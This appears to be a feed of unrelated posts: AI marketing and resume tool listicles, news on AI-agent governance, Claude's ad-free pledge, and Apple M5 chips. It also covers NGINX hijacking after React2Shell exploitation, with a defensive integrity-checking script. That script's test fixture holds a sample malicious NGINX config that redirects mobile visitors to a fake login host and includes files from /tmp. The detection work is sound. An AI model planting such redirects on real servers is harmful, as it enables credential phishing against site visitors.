Short Description: SendGrid is an email marketing platform known for its strong email deliverability. It uses AI to enhance email performance and is designed for developers, marketers, and businesses of all sizes.
Key Features:
- AI-powered analytics: data-driven insights to optimize email performance.
- Advanced segmentation: AI-driven audience segmentation for tailored messages.
- Automation workflows: automatic email sequences based on customer behavior.
- Deliverability optimization: AI tools to help your emails reach the inbox.
- Scalable email sending: suited to both small campaigns and large-scale operations.
Pros:
- Excellent deliverability rates.
- Flexible pricing options, including a free tier.
- Great API for developers.
Cons:
- Lacks some advanced design features compared to competitors.
- Learning curve for beginners.
Official Website: SendGrid

4. GetResponse
Short Description: GetResponse is an AI-powered email marketing platform that offers automation, CRM, and landing page building. It is particularly useful for businesses looking to create comprehensive email campaigns.
Key Features:
- Email automation: create sophisticated email workflows.
- Advanced AI segmentation: target the right people with the right message.
- Landing page builder: build optimized landing pages for conversions.
- Webinar hosting: integrate webinars with email campaigns.
- In-depth analytics: AI-driven reporting to enhance performance.
Pros:
- Comprehensive suite with email, CRM, and webinars.
- Strong customer support and knowledge base.
Cons:
- Limited integrations compared to other platforms.
- Some features may require an additional cost.
Official Website: GetResponse

5. ConvertKit
Short Description: ConvertKit is a popular choice for content creators and small businesses. It uses AI to personalize email campaigns based on audience behavior and engagement.
Key Features:
- Easy automation: set up email sequences with minimal effort.
- AI-driven personalization: deliver personalized content based on user preferences.
- Landing pages and forms: easily create high-converting landing pages.
- Segmentation and tagging: organize your audience for more precise targeting.
- Reports and analytics: gain insights to improve future campaigns.
Pros:
- Great for creators and small businesses.
- Simple and clean interface.
- Excellent automation tools.
Cons:
- Limited advanced features for larger businesses.
- Lacks some eCommerce functionality.
Official Website: ConvertKit

6. Moosend
Short Description: Moosend is an AI-powered email marketing platform designed for eCommerce businesses. It offers sophisticated automation and analytics tools to help marketers improve engagement.
Key Features:
- AI-powered recommendations: suggests email content based on user behavior.
- Smart segmentation: automatically segments contacts based on interests and activity.
- Advanced A/B testing: test and optimize emails for better performance.
- Behavioral triggers: send emails triggered by user actions on your website.
- Real-time reporting: monitor campaign performance with real-time metrics.
Pros:
- Affordable pricing plans.
- Great for eCommerce businesses.
- Easy-to-use interface.
Cons:
- Limited integrations with other software.
- Basic design features compared to others.
Official Website: Moosend

7. Klaviyo
Short Description: Klaviyo is an advanced AI email marketing platform built for eCommerce businesses. It integrates with platforms like Shopify and BigCommerce to deliver personalized and automated email campaigns.
Key Features:
- AI-powered segmentation: segment customers based on behaviors and actions.
- Predictive analytics: use AI to predict customer lifetime value and engagement.
- Personalized recommendations: send tailored product suggestions.
- Automation workflows: automate email sequences based on customer actions.
- Advanced reporting: monitor campaigns with in-depth analytics.
Pros:
- Excellent for eCommerce businesses.
- Deep integrations with popular eCommerce platforms.
- Powerful AI tools for segmentation.
Cons:
- Can be expensive for small businesses.
- Steeper learning curve for new users.
Official Website: Klaviyo

8. Benchmark Email
Short Description: Benchmark Email offers a user-friendly interface with AI-powered features that help businesses craft personalized email campaigns with ease.
Key Features:
- AI-powered segmentation: segment your audience for personalized emails.
- Customizable templates: AI recommends the best templates.
- Email automation: automate your email marketing based on customer behavior.
- Campaign analytics: measure and improve your campaigns with AI-driven insights.
- Simple drag-and-drop editor: easily design professional emails.
Pros:
- Easy to use for beginners.
- Affordable pricing plans.
- Great customer support.
Cons:
- Limited advanced features.
- Basic integrations compared to competitors.
Official Website: Benchmark Email

9. Drip
Short Description: Drip is an AI-driven email marketing automation tool designed for eCommerce businesses, offering advanced features to help businesses scale their marketing efforts.
Key Features:
- Smart segmentation: use AI to segment customers based on their behavior.
- Email personalization: automatically personalize content for each subscriber.
- Advanced automation: build automated workflows that trigger on customer actions.
- Multi-channel marketing: integrate email, SMS, and other marketing channels.
- Detailed analytics: track campaign success with in-depth reporting.
Pros:
- Powerful automation tools for eCommerce.
- Great for building personalized email flows.
- Excellent customer support.
Cons:
- Pricing can be high for small businesses.
- May have a steeper learning curve.
Official Website: Drip

Comparison Table

| Tool Name | Best For | Platform(s) Supported | Standout Feature | Pricing | Rating |
|---|---|---|---|---|---|
| Omnisend | Small to medium businesses | Web, iOS, Android | AI-powered personalization | Free / Starts at $9.99 | 4.5/5 |
| ActiveCampaign | Businesses of all sizes | Web, iOS, Android | Automated workflows | Starts at $9/month | 4.7/5 |
| SendGrid | Developers and marketers | Web, iOS | Deliverability optimization | Free / Custom | 4.3/5 |
| GetResponse | eCommerce and marketers | Web, iOS | Landing page builder | Starts at $15/month | 4.6/5 |
| ConvertKit | Content creators | Web, iOS | Easy automation | Free / Starts at $9 | 4.5/5 |
| Moosend | eCommerce businesses | Web, iOS | AI-powered recommendations | Free / Starts at $8 | 4.4/5 |
| Klaviyo | eCommerce | Web, iOS | Predictive analytics | Custom | 4.7/5 |
| Benchmark Email | Small businesses | Web, iOS, Android | AI-powered segmentation | Free / Starts at $13.99 | 4.4/5 |
| Drip | eCommerce | Web, iOS | Multi-channel marketing | Starts at $19/month | 4.5/5 |

Which AI Email Marketing Tool Is Right for You?
Decision-Making Guide:
- Small businesses or startups: tools like Mailchimp or Benchmark Email offer great value for money and simplicity in design and automation.
- eCommerce businesses: platforms like Omnisend, Klaviyo, or Drip provide advanced AI-driven segmentation and integration with eCommerce platforms.
- Content creators: ConvertKit is well suited to creators looking to automate email marketing with simplicity and efficiency.
- Enterprise businesses: ActiveCampaign provides extensive integrations, workflow automation, and advanced analytics.

Conclusion
As AI continues to transform the way businesses approach marketing, AI email marketing tools in 2025 are essential for staying competitive. By selecting the right tool, you can optimize your email campaigns, increase customer engagement, and drive sales. We recommend taking advantage of free trials or demos to explore the features of these tools and determine the best fit for your needs.

FAQs:
What are AI email marketing tools?
AI email marketing tools use machine learning and data analytics to automate and personalize email campaigns, helping businesses engage with their audience more effectively.
Which AI email marketing tool is best for eCommerce?
Klaviyo and Omnisend are excellent choices for eCommerce businesses due to their advanced AI-powered segmentation and integration capabilities.
Are AI email marketing tools expensive?
While some AI tools offer free plans, advanced features often come with a price. Pricing varies by tool, from free to premium tiers.
Can AI email marketing tools help with segmentation?
Yes. AI email marketing tools use machine learning to analyze customer behavior and segment audiences for more targeted campaigns.
How do AI email marketing tools improve engagement?
AI tools enhance engagement by sending personalized content at the right time and tailoring messages to user behavior and preferences.
A December 2025 survey of 750 IT executives and practitioners, conducted by Opinion Matters for Gravitee, found that AI agents are being deployed faster than security teams can keep up. There are now, said Rory Blundell, CEO of Gravitee, over three million AI agents operating within corporations, which he described as a workforce larger than the entire global employee count of Walmart.
The three million figure is an extrapolation from the survey results using government estimates of 8,250 UK businesses and 77,000 US businesses with 250 or more employees. The mean number of AI agents deployed per business was 36.9, and 88% of respondents said their organization had “experienced or suspected an AI agent-related security or data privacy incident in the past 12 months.”
The mean percentage of agents that are not actively monitored and secured, according to the findings, was 53%.
Asked what prompted the study, Blundell wrote in an email, “we’re all familiar with stories of AI agents going rogue: deleting codebases, leaking confidential information, inventing fake data. The working hypothesis that prompted this research was that, while agentic deployment is reaching an exciting stage, businesses have not yet caught up with agent governance. The research validates that.”
A global problem
Agents, he said, “can offer businesses a huge productivity gain, but we have to be realistic about the risks: without governance and oversight, they can easily start becoming liabilities, and a danger to consumers and businesses alike.”
In addition, said Blundell, despite respondents being only from the UK and US, “this is absolutely a global problem. Companies around the world are using AI agents, and across the board there is a gap between the level of deployment and the level of governance. We have a strong customer base in the EU, where we see the same problems.”
David Shipley, head of Canada-based security awareness training firm Beauceron Security, said, "the only thing that shocks me is that people think it's only 53% of agents that aren't monitored. It's higher."
He likened the results from the Gravitee study to a “lesson about the Titanic that everyone in technology keeps ignoring. The Titanic disaster didn’t happen because they didn’t know there would be icebergs on the trip. They knew it was peak iceberg season, they knew they were going too fast.”
Shipley said that the ship’s captain and his crew “thought they’d detect [an iceberg]; if they didn’t, and hit one, that their technology controls would protect them to help them recover.” They put their faith in the so-called watertight compartments that, it turned out, weren’t watertight at the top, but, most importantly, they trusted the new wireless communications technology that they could use to call for help if they got in trouble. The equivalent today: “Well, IT and security can fix it if we get in trouble with our agents.”
“Wrong then, super wrong now,” he said.
He said, “we know AI agents are inherently dangerous and unreliable. There’s literally math proofs out there that show it. So, we know there are icebergs. Let me repeat this for those at the back of the room: 100% of AI agents have the potential to go rogue. If a vendor assures you it isn’t possible and their core technology is an LLM, they’re lying. We know we’re going too fast in adoption for the risks we know exist.”
Shipley added, “now, the funny part: imagine if the Titanic still made the choices it did, knowing the watertight compartments didn’t work (aka monitoring is missing for 53% of AI agents), we know by the time IT and security roll on an AI agent risk, the damage is done (the ship’s sinking too fast and radio isn’t going to help because help will be too late). And we still made the choices we’re making.”
The real issue is invisible AI, not rogue AI
Manish Jain, principal research director at Info-Tech Research Group, said that as the “exponential” speed of AI development continues, his firm, based on experiences with CIOs and CDOs, predicts that there will be more AI agents globally by the year 2028 than the number of human employees. “It would be one of the biggest challenges for business and IT executives to govern them without curtailing the innovation that these AI agents bring with them,” he said.
Even today, he noted, “we see that most enterprise AI agents are running without oversight. Many organizations don’t even know how many agents they have, where they’re running, or what they can touch. If you don’t know how many mules are in the barn, don’t act surprised when one kicks the door down.”
Jain pointed out that AI agents are no different. “Unaccounted agents often emerge through sanctioned, low-code tools and informal experimentation, bypassing traditional IT scrutiny until something breaks. You cannot govern what you can’t see. So, we need to understand that the real issue isn’t ‘rogue AI’, it’s invisible AI.”
Info-Tech, he added, “strongly believes that governing AI models or pre-approving agents is no longer enough, because invisible, rogue agents will do tandava (the dance of destruction) at runtime. This is because, when it comes to governing these AI agents, the number is so huge that approval gates will not be sustainable without halting the innovation. Continuous oversight should be the priority for AI governance after setting initial guardrails as part of the AI strategy.”
Perspective, he said, also needs to change: “AI agents are no longer helpful bots. They often operate with delegated yet broad credentials, persistent access, and undefined accountability. This can become a costly mistake as overprivileged agents are the new insider threat. We need to define tiered access for AI agents. While we can’t avoid giving a few people keys to our house to speed up things, if you trust every stranger with your house keys, we wouldn’t be able to blame the locksmith when things go missing.”
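The inventory and tiered-access points above can be made concrete. The Python script below is an added example, not code from Gravitee, Info-Tech or any survey respondent: it reads a constructed API-gateway log of agent tool calls, builds an inventory of which agents are actually active, and checks each call against a registry of sanctioned agents and the scopes their tier allows. The registry, the tiers, the scope names and the log lines are all assumptions made up for the example.

```python
"""Added example (not from Gravitee, Info-Tech or the survey): build an agent
inventory from an API-gateway log and check every call against a tiered
access policy. The log lines, registry and scope tiers are constructed for
this example; a real deployment would read them from the gateway and an
identity registry."""
import json

# Constructed registry of sanctioned agents: agent id -> tier.
REGISTRY = {
    "agent-helpdesk-01": "read",
    "agent-finance-02": "write",
}

# Tiered policy (assumption): the scopes each tier may exercise.
TIER_SCOPES = {
    "read": {"tickets:read", "kb:read"},
    "write": {"tickets:read", "kb:read", "invoices:write"},
    "admin": {"tickets:read", "kb:read", "invoices:write", "users:delete", "db:export"},
}

# Constructed gateway log, one JSON object per tool call an agent made.
GATEWAY_LOG = """\
{"ts": "2025-12-03T09:14:02Z", "agent": "agent-helpdesk-01", "scope": "tickets:read"}
{"ts": "2025-12-03T09:14:09Z", "agent": "agent-helpdesk-01", "scope": "kb:read"}
{"ts": "2025-12-03T09:15:31Z", "agent": "agent-finance-02", "scope": "invoices:write"}
{"ts": "2025-12-03T09:16:44Z", "agent": "agent-finance-02", "scope": "db:export"}
{"ts": "2025-12-03T09:20:12Z", "agent": "copilot-test-jdoe", "scope": "users:delete"}
"""


def parse_log(text):
    """Parse JSON-lines gateway output, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def observed_agents(events):
    """Inventory from the wire: agent id -> set of scopes it actually used."""
    seen = {}
    for ev in events:
        seen.setdefault(ev["agent"], set()).add(ev["scope"])
    return seen


def audit(events, registry=REGISTRY, tier_scopes=TIER_SCOPES):
    """Return the governance gaps the log reveals:
    - unregistered: agents calling tools that are not in the registry
      (the 'invisible' agents Jain describes);
    - violations: calls by registered agents outside their tier's scopes;
    - unused_grants: scopes a registered agent may use but never has, which is
      the first cut at tightening its tier;
    - registered_fraction: how much of the observed fleet is under governance.
    """
    seen = observed_agents(events)
    unregistered = {a for a in seen if a not in registry}
    violations = [
        (ev["agent"], ev["scope"], ev["ts"])
        for ev in events
        if ev["agent"] in registry
        and ev["scope"] not in tier_scopes[registry[ev["agent"]]]
    ]
    unused_grants = {
        agent: tier_scopes[tier] - seen.get(agent, set())
        for agent, tier in registry.items()
    }
    registered_fraction = (len(seen) - len(unregistered)) / len(seen) if seen else 1.0
    return {
        "unregistered": unregistered,
        "violations": violations,
        "unused_grants": unused_grants,
        "registered_fraction": registered_fraction,
    }


if __name__ == "__main__":
    report = audit(parse_log(GATEWAY_LOG))
    print("unregistered agents:", sorted(report["unregistered"]))
    print("out-of-tier calls:", report["violations"])
    print("grants never exercised:", report["unused_grants"])
    print(f"registered fraction: {report['registered_fraction']:.0%}")
```

The inventory here is only as complete as the gateway: an agent spun up in a low-code tool with its own API key, the case Jain describes, never crosses it and stays invisible. Correlate the observed set with the identity provider's service accounts and OAuth clients, and treat the registered fraction as a lower bound on governance coverage rather than the answer.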
- 0 comments
- 44 views
In today’s competitive job market, having a well-crafted resume is more important than ever. With hiring processes becoming increasingly automated, it’s essential for job seekers to stand out through a professional and polished resume. This is where AI resume builders come into play. AI-powered tools offer automation, efficiency, and customization to help users create impactful resumes without the hassle. These tools are designed to help users design resumes that meet industry standards, match job descriptions, and optimize the content for applicant tracking systems (ATS).
As we move into 2025, AI resume builders are evolving to offer smarter features that provide personalized insights, design recommendations, and keyword optimization. When choosing an AI resume builder tool, users should look for key features such as ease of use, integration with job boards, resume templates, customization options, and ATS compatibility.
In this article, we will explore the Top 10 AI Resume Builder Tools in 2025, compare their features, and help you find the best solution for your resume needs.
Top 10 AI Resume Builder Tools in 2025
1. ResumeCoach
ResumeCoach is an AI-powered resume and cover letter builder that helps you create (or improve) a job-ready resume in minutes using ATS-friendly templates, guided writing tips, and AI-generated phrases. It’s a solid option for job seekers who want a fast, structured way to produce professional documents.
Key Features:
- Create a resume from a template or upload an existing resume to improve it with AI
- ATS-friendly templates with guided, section-by-section writing support
- AI-generated phrases and role-specific suggestions to strengthen bullet points and summaries
- Cover letter builder + AI cover letter generator to match your resume
- Download and sharing options (PDF/TXT downloads and share via a private link, depending on plan/features)
Pros:
- Beginner-friendly flow: templates + expert guidance make it easy to avoid common resume mistakes
- AI enhancements help quickly improve wording and add professional phrasing
- Free plan available to start building and test the workflow
Cons:
- Free plan is limited (e.g., TXT download on the free tier; advanced downloads/features typically require an upgrade)
- Some advanced features (stronger AI tools and full export options) are gated behind paid plans
Official Website: ResumeCoach
2. Zety
Short Description:
Zety is an AI resume builder tool designed to simplify the resume creation process with customizable templates and expert-written tips. It’s perfect for job seekers who want to craft a professional resume quickly.
Key Features:
- A wide variety of professionally designed templates
- Customizable sections for work experience, skills, and certifications
- Real-time content suggestions based on job titles
- Easy export options (PDF, DOCX, TXT)
- Integrated cover letter builder
Pros:
- Provides actionable tips and advice during the resume-building process
- Free resume templates available
- Advanced customization for premium users
Cons:
- Requires a paid subscription for full access to premium features
- Limited design options for free users
3. Novoresume
Short Description:
Novoresume is a resume builder that uses AI to create personalized resumes based on user input. It’s especially suited for job seekers looking to target specific industries, as it provides tailored resume templates for various career fields.
Key Features:
- Industry-specific templates
- AI-driven suggestions for optimizing resume content
- Cover letter builder and CV generator
- Real-time feedback for improving content
- Mobile-friendly interface for easy access
Pros:
- Personalized industry-specific advice
- ATS-friendly templates
- Highly intuitive user interface
Cons:
- Free version limits access to templates and features
- Advanced features are behind a paywall
4. Resumake
Short Description:
Resumake is a simple, user-friendly AI-powered resume builder that allows users to create resumes quickly and efficiently. It is perfect for those who need a resume fast without a steep learning curve.
Key Features:
- No sign-up required to use the tool
- Basic yet effective templates
- Easy-to-navigate interface
- Free to use with no hidden fees
- Simple download options (PDF format)
Pros:
- Completely free to use
- Minimalist interface that is easy to understand
- Ideal for quick resume building
Cons:
- Limited template variety
- Lack of advanced customization features
5. Kickresume
Short Description:
Kickresume is an AI-powered resume builder with a focus on creating highly personalized resumes that reflect individual branding. It’s ideal for professionals looking to stand out with unique design elements and a highly customized experience.
Key Features:
- AI-driven content suggestions for every section of the resume
- Access to more than 30 templates
- Resume analysis and optimization for ATS
- Cover letter generator
- Design customizations to reflect personal branding
Pros:
- Offers strong design flexibility and customization
- Perfect for professionals in creative fields
- Multiple language support
Cons:
- Limited functionality in the free version
- Premium subscription required for full access to templates
6. VisualCV
Short Description:
VisualCV offers AI-powered resume building with a focus on creating visually appealing and content-rich resumes. It’s well-suited for professionals in creative and technical fields, allowing them to create standout resumes.
Key Features:
- Highly customizable templates
- Visual resume options with data visualization
- Professional portfolio integration
- ATS-friendly formatting
- One-click export to PDF and other formats
Pros:
- Focuses on professional branding with customizable design elements
- Great for those in creative industries
- Provides in-depth analytics for resume performance
Cons:
- More expensive compared to some other tools
- Advanced features are only available in premium plans
7. ResumeBuilder
Short Description:
ResumeBuilder is an AI-powered tool that generates professional resumes with easy-to-use templates and guided content creation. It is ideal for users who need an effective resume without needing to spend too much time customizing.
Key Features:
- Step-by-step resume creation wizard
- Customizable templates for various industries
- Free resume downloads in PDF format
- Built-in cover letter builder
- Professional tips and suggestions
Pros:
- Simplified user interface
- Excellent for entry-level job seekers
- Free option available
Cons:
- Limited templates in the free version
- Fewer advanced customization features
8. Jobscan
Short Description:
Jobscan focuses on helping users optimize their resumes to pass through applicant tracking systems (ATS). The tool’s AI analyzes job descriptions and tailors resumes to improve the chances of getting noticed by recruiters.
Key Features:
- ATS-friendly resume scanning
- Tailored keyword recommendations
- Job description comparison tool
- Real-time feedback for optimizing resume content
- Integration with job boards
Pros:
- Excellent ATS optimization and keyword targeting
- Focuses on improving the job search process
- Provides insights on how your resume fares against job descriptions
Cons:
- Limited free features
- Requires a premium plan for full functionality
9. Enhancv
Short Description:
Enhancv’s AI resume builder helps job seekers craft customized and impactful resumes. It’s particularly useful for those seeking unique and visually engaging resumes that reflect their skills and accomplishments.
Key Features:
- Customizable templates for creative resumes
- Visual resume design options
- Skills and achievement-based sections
- Real-time resume content suggestions
- One-click export to PDF or Word formats
Pros:
- Beautiful design options that allow for personalization
- Great for creative and tech professionals
- Easy-to-navigate platform
Cons:
- Free version offers limited templates
- Some templates are only available with paid plans
10. Resumelab
Short Description:
Resumelab is an easy-to-use AI resume builder that focuses on simplicity and fast results. It’s perfect for users who want a quick yet professional resume without unnecessary complications.
Key Features:
- Step-by-step resume building process
- Multiple professional templates to choose from
- Fast resume generation and export options
- ATS-friendly formatting
- 24/7 customer support
Pros:
- Quick and straightforward resume creation
- User-friendly interface
- Free version available with basic features
Cons:
- Limited customization in the free version
- Premium features are necessary for advanced templates
Comparison Table
Tool Name | Best For | Platform(s) Supported | Standout Feature | Pricing | G2/Capterra Rating
ResumeCoach | All industries | Web, iOS, Android | ATS-friendly templates | Free/Paid | 4.7/5
Zety | Professionals across sectors | Web | Customizable sections with tips | Paid | 4.6/5
Novoresume | Industry-specific resumes | Web | Tailored industry templates | Free/Paid | 4.8/5
Resumake | Quick resume creation | Web | Simple interface, no sign-up needed | Free | 4.5/5
Kickresume | Creative professionals | Web | Custom branding options | Paid | 4.7/5
VisualCV | Creative & technical fields | Web | Visual data integration | Free/Paid | 4.5/5
ResumeBuilder | Entry-level job seekers | Web | Easy-to-follow wizard | Free/Paid | 4.4/5
Jobscan | ATS optimization | Web | Job description comparison | Paid | 4.9/5
Enhancv | Creative professionals | Web | Visual designs and achievements | Paid | 4.6/5
Resumelab | Fast, simple resumes | Web | Fast resume generation | Free/Paid | 4.3/5
Which AI Resume Builder Tool Is Right for You?
When selecting the best AI resume builder, it’s important to consider your career stage, industry, and specific needs:
- Entry-level job seekers may prefer ResumeBuilder or Resumake for their ease of use and free options.
- Creative professionals can benefit from tools like Enhancv or Kickresume for highly customizable designs.
- Industry-specific resumes are best with Novoresume, which tailors templates to various job sectors.
- Job seekers needing ATS optimization should consider Jobscan or Zety, which offer specialized features to get past hiring software.
Conclusion
AI resume builders are an invaluable tool for job seekers looking to stand out in a competitive market. As we head into 2025, these tools are becoming more advanced, with better customization options, ATS optimization, and industry-specific templates. Whether you are crafting your first resume or updating your current one, these AI-powered tools can help streamline the process and improve your chances of landing an interview. We encourage you to try out demos or free trials to see which one works best for your needs.
- 0 comments
- 43 views
According to Anthropic, including ads in Claude would not be in line with its mission of creating a helpful assistant for work and deep thinking. Anthropic claims that users should not need to second-guess whether an AI is being helpful or "subtly steering the conversation towards something monetizable."
There will be no ads or sponsored links in conversations with Claude, and Claude's responses will not be influenced by advertisers or include third-party product placements.
Promising an ad-free experience could encourage people to choose Claude over OpenAI's ChatGPT. In January, OpenAI said that it would start testing ads in the United States for free and Go tier subscribers, though subscribers with higher paid tiers will not see ads. OpenAI claims that ads will be clearly labeled and will not influence the answers that ChatGPT provides, nor will the company provide conversation details to advertisers.
To further reinforce the difference between Claude's ad-free experience and ChatGPT's ad-supported experience, Anthropic plans to run a humorous Super Bowl commercial where a man gets an unwanted cougar dating ad after asking about his mother. "Ads are coming to AI," reads the video's text. "But not to Claude."
Anthropic plans to continue to monetize through enterprise contracts and paid subscriptions, with revenue reinvested in improving Claude. Anthropic will maintain a free tier, and the company says that it may also offer lower-cost subscription tiers and regional pricing in the future if there is demand for it. Claude Pro is priced at $20 per month, which is the same price as ChatGPT's higher-end Plus tier.
An ad-free Claude experience isn't a sure thing forever, as Anthropic gives itself an out in the blog post: "Should we need to revisit this approach, we'll be transparent about our reasons for doing so."
Tags: Anthropic, ChatGPT, OpenAI
This article, "Anthropic Promises Claude Will Remain Ad-Free, Mocks ChatGPT Ads in Super Bowl Commercial" first appeared on MacRumors.com
- 0 comments
- 37 views
The iOS 26.3 RC mentions two unreleased SoCs, T6051 and T6052, with associated H17C and H17D platform names. The 17 is a reference to the M5, as the standard M5 chip is numbered H17G. Typically, the "C" lettering is used with a Max chip, and the "D" lettering is used for Ultra chips. G is used for standard chips, and S is used for Pro chips.
When using Apple's past numbering and lettering as a reference, that would suggest an M5 Max and an M5 Ultra chip. There is no current reference to T6050 H17S, which is the chip identifier and platform name we'd expect for the M5 Pro.
Since we're currently waiting on new versions of the MacBook Pro with M5 Pro and M5 Max chips, the chip references we've located are a bit confusing. There are three possibilities: an M5 Pro chip exists alongside the M5 Max and M5 Ultra and simply hasn't been added to the iOS 26.3 code yet, Apple is changing its numbering, or Apple is planning M5 Max and M5 Ultra MacBook Pro models.
Chip 1 in the beta: T6051, H17C. Presumably M5 Max.
Chip 2 in the beta: T6052, H17D. Presumably M5 Ultra.
Not in the beta: T6050, H17S. Chip identifier expected for M5 Pro.
Apple's past Max chips have all used "C" lettering, including the M1 Max (H13C), M2 Max (H14C), M3 Max (H15C/H15M), and M4 Max (H16C). There was also an M variant of the M3 Max for the 14-core chip, with Apple using C for the 16-core chip.
Ultra chips have all used "D" lettering, including the M1 Ultra (H13D), M2 Ultra (H14D), and M3 Ultra (H15D). There was no M4 Ultra chip.
It's not clear why we are only seeing signs of an M5 Max and M5 Ultra chip, but rumors suggest that new MacBook Pro models with higher-end M5 chips are set to launch in the next few weeks. Apple is supposedly working on a Mac Studio in the M5 family, which would use an M5 Ultra chip, but we haven't heard rumors about an upcoming launch.
This article, "New M5 Chips Spotted in iOS 26.3 Beta" first appeared on MacRumors.com
- 0 comments
- 33 views
That's the conclusion of researchers at Datadog Security Labs, who said in a blog post Wednesday that the primary targets are sites running the open-source NGINX web server managed with the Baota (BT) Panel hosting control panel. These include organizations, largely in Asia, with top-level domains such as .in, .id, .pe, .bd, .th, .edu and .gov, as well as Chinese hosting infrastructure.
The danger, said blog author Ryan Simon, a senior security researcher at Datadog Security Labs, is that a hacker can use a compromised site to do a number of nasty things such as fingerprint an organization’s web traffic, insert malware onto users’ computers, or divert traffic to a threat actor-controlled landing page that tries to trick users into giving up login credentials.
These last two tactics also end up damaging a website’s reputation, Simon added, if the word gets around that the site hosts malware.
NGINX is a "foundational element of contemporary web infrastructure," the Datadog blog notes. How NGINX routes and processes traffic is governed entirely by its configuration files, so a misconfiguration, or an attacker who gains write access to those files after a breach, turns the server into a traffic-hijacking tool.
For CSOs, the defense against these attacks is to lock down those configuration files and detect any change to them.
React2Shell is the exploitation of CVE-2025-55182, a vulnerability in React Server Components in the React 19 library for building application interfaces, discovered late last year. The hole allows attackers to execute arbitrary code on affected servers.
Related content: Anatomy of React2Shell
Researchers at GreyNoise said this week that exploitation activity targeting React Server Components has consolidated significantly: where earlier activity came from 1,083 unique sources, two IP addresses now account for 56% of all observed exploitation attempts.
Unpatched versions of React remain at risk of compromise.
Initial abuse
"What we saw in a lot of our honeypots and threat intelligence early on with React2Shell is attackers were using it for cryptomining," said Simon. Others have seen exploitation used to deploy reverse shells. More recently, Simon said, Datadog Security Labs is seeing threat actors, once inside an IT network, going after web servers to hijack their traffic.
An analysis of the scripts used by threat actors on compromised NGINX web servers shows they use a multi-stage and automated approach to attacking the environments. The toolkits contain target discovery plus several scripts designed to establish persistence and for the creation of malicious configuration files containing instructions intended to redirect web traffic, says the Datadog blog.
There is no commonality among the targeted organizations, Simon noted.
Hijacking web traffic is an old tactic for threat actors. In fact David Shipley, head of Canadian security awareness training provider Beauceron Security, called these attacks on NGINX servers “a return to old-school hacking in the era of stronger identity controls like password managers, MFA and passkeys.”
“If you’re up against a more robustly defended user, you go back to attacking the infrastructure so you can go back into attacker-in-the-middle mode for some good old session cookie capture and other hijinks on the NGINX,” he said.
Finding and exploiting server side vulnerabilities or network security vulnerabilities is fast, cheap, and easy with AI, he added.
Simon said CSOs can help protect NGINX servers from being exploited by monitoring configuration file integrity, which means keeping a record of the known-good server configuration so that any change to it can be spotted.
Web servers must also carry the latest security patches, he added, and admins should monitor the NGINX security advisories page.
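As an added example (not code from the Datadog blog, the attackers' toolkit, or the NGINX project), the Python script below shows what Simon's recommendation looks like in practice: it keeps a SHA-256 baseline of every configuration file, diffs the live tree against it, and scans anything new or changed for directives that send traffic somewhere it should not go. The config contents, the trusted-host allowlist, the /etc/nginx root and the example.net redirect target are all constructed for this example; the "include outside the config root" heuristic is an assumption of mine, not something the blog describes.

```python
"""Added example (not from the Datadog blog or its toolkit): an NGINX config
integrity check of the kind Simon recommends. It keeps a SHA-256 baseline of
every config file, diffs the live tree against it, and scans any changed or
new file for traffic-redirecting directives whose target host is not on an
allowlist. File contents are embedded as constructed strings so the script
runs offline; in production you would read them from /etc/nginx."""
import hashlib
import re

CONFIG_ROOT = "/etc/nginx"  # assumption: default Debian/Ubuntu layout

# Hosts NGINX is allowed to redirect or proxy to. Constructed for the example.
TRUSTED_HOSTS = {"127.0.0.1", "example.org", "www.example.org"}

# Constructed baseline, recorded when the server was known-good.
BASELINE = {
    "/etc/nginx/nginx.conf": (
        "user www-data;\n"
        "worker_processes auto;\n"
        "http {\n"
        "    include /etc/nginx/mime.types;\n"
        "    include /etc/nginx/conf.d/*.conf;\n"
        "}\n"
    ),
    "/etc/nginx/conf.d/app.conf": (
        "server {\n"
        "    listen 80;\n"
        "    server_name example.org;\n"
        "    location / {\n"
        "        proxy_pass http://127.0.0.1:3000;\n"
        "    }\n"
        "}\n"
    ),
}

# Constructed "live" tree: app.conf gained a conditional redirect for mobile
# visitors, and a new drop-in pulls config from outside CONFIG_ROOT.
LIVE = dict(BASELINE)
LIVE["/etc/nginx/conf.d/app.conf"] = (
    "server {\n"
    "    listen 80;\n"
    "    server_name example.org;\n"
    "    location / {\n"
    "        if ($http_user_agent ~* \"(iPhone|Android)\") {\n"
    "            return 302 http://login-update.example.net$request_uri;\n"
    "        }\n"
    "        proxy_pass http://127.0.0.1:3000;\n"
    "    }\n"
    "}\n"
)
LIVE["/etc/nginx/conf.d/.cache.conf"] = "include /tmp/.x/*.conf;\n"

# return 30x URL; proxy_pass URL; rewrite REGEX URL [flag];
DIRECTIVE_RE = re.compile(r"^(return\s+30[1278]|proxy_pass|rewrite\s+\S+)\s+(\S+?)(?:\s+\S+)*;?$")
INCLUDE_RE = re.compile(r"^include\s+(\S+?);$")
HOST_RE = re.compile(r"^https?://([^/:$]+)")


def fingerprint(tree):
    """Map each config path to the SHA-256 of its contents."""
    return {p: hashlib.sha256(c.encode()).hexdigest() for p, c in tree.items()}


def diff_manifest(baseline, live):
    """Return (added, removed, modified) path lists between two config trees."""
    b, l = fingerprint(baseline), fingerprint(live)
    added = sorted(set(l) - set(b))
    removed = sorted(set(b) - set(l))
    modified = sorted(p for p in set(b) & set(l) if b[p] != l[p])
    return added, removed, modified


def scan_config(path, text, trusted=TRUSTED_HOSTS, root=CONFIG_ROOT):
    """Flag directives that send traffic to untrusted hosts or include files
    from outside the config root. Targets built from variables such as
    https://$host$request_uri have no literal host and are skipped here."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = DIRECTIVE_RE.match(line)
        if m:
            host = HOST_RE.match(m.group(2))
            if host and host.group(1) not in trusted:
                findings.append((path, lineno, "untrusted-target", host.group(1)))
            continue
        m = INCLUDE_RE.match(line)
        if m and not m.group(1).startswith(root + "/"):
            findings.append((path, lineno, "include-outside-root", m.group(1)))
    return findings


def audit(baseline, live):
    """Integrity diff, then a directive scan of everything that changed."""
    added, removed, modified = diff_manifest(baseline, live)
    findings = [("", 0, "removed", p) for p in removed]
    for p in added + modified:
        findings.extend(scan_config(p, live[p]))
    return findings


if __name__ == "__main__":
    for finding in audit(BASELINE, LIVE):
        print(finding)
```

Run it from cron or a file-integrity agent, but keep the baseline manifest and the script off the web server: an attacker with write access to /etc/nginx can usually overwrite a baseline stored beside it. The scan only catches redirects with a literal host; a target built from variables such as https://$host$request_uri needs a separate policy, and a reload-time check (nginx -t followed by a diff of the running configuration) complements the on-disk comparison.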
- 0 comments
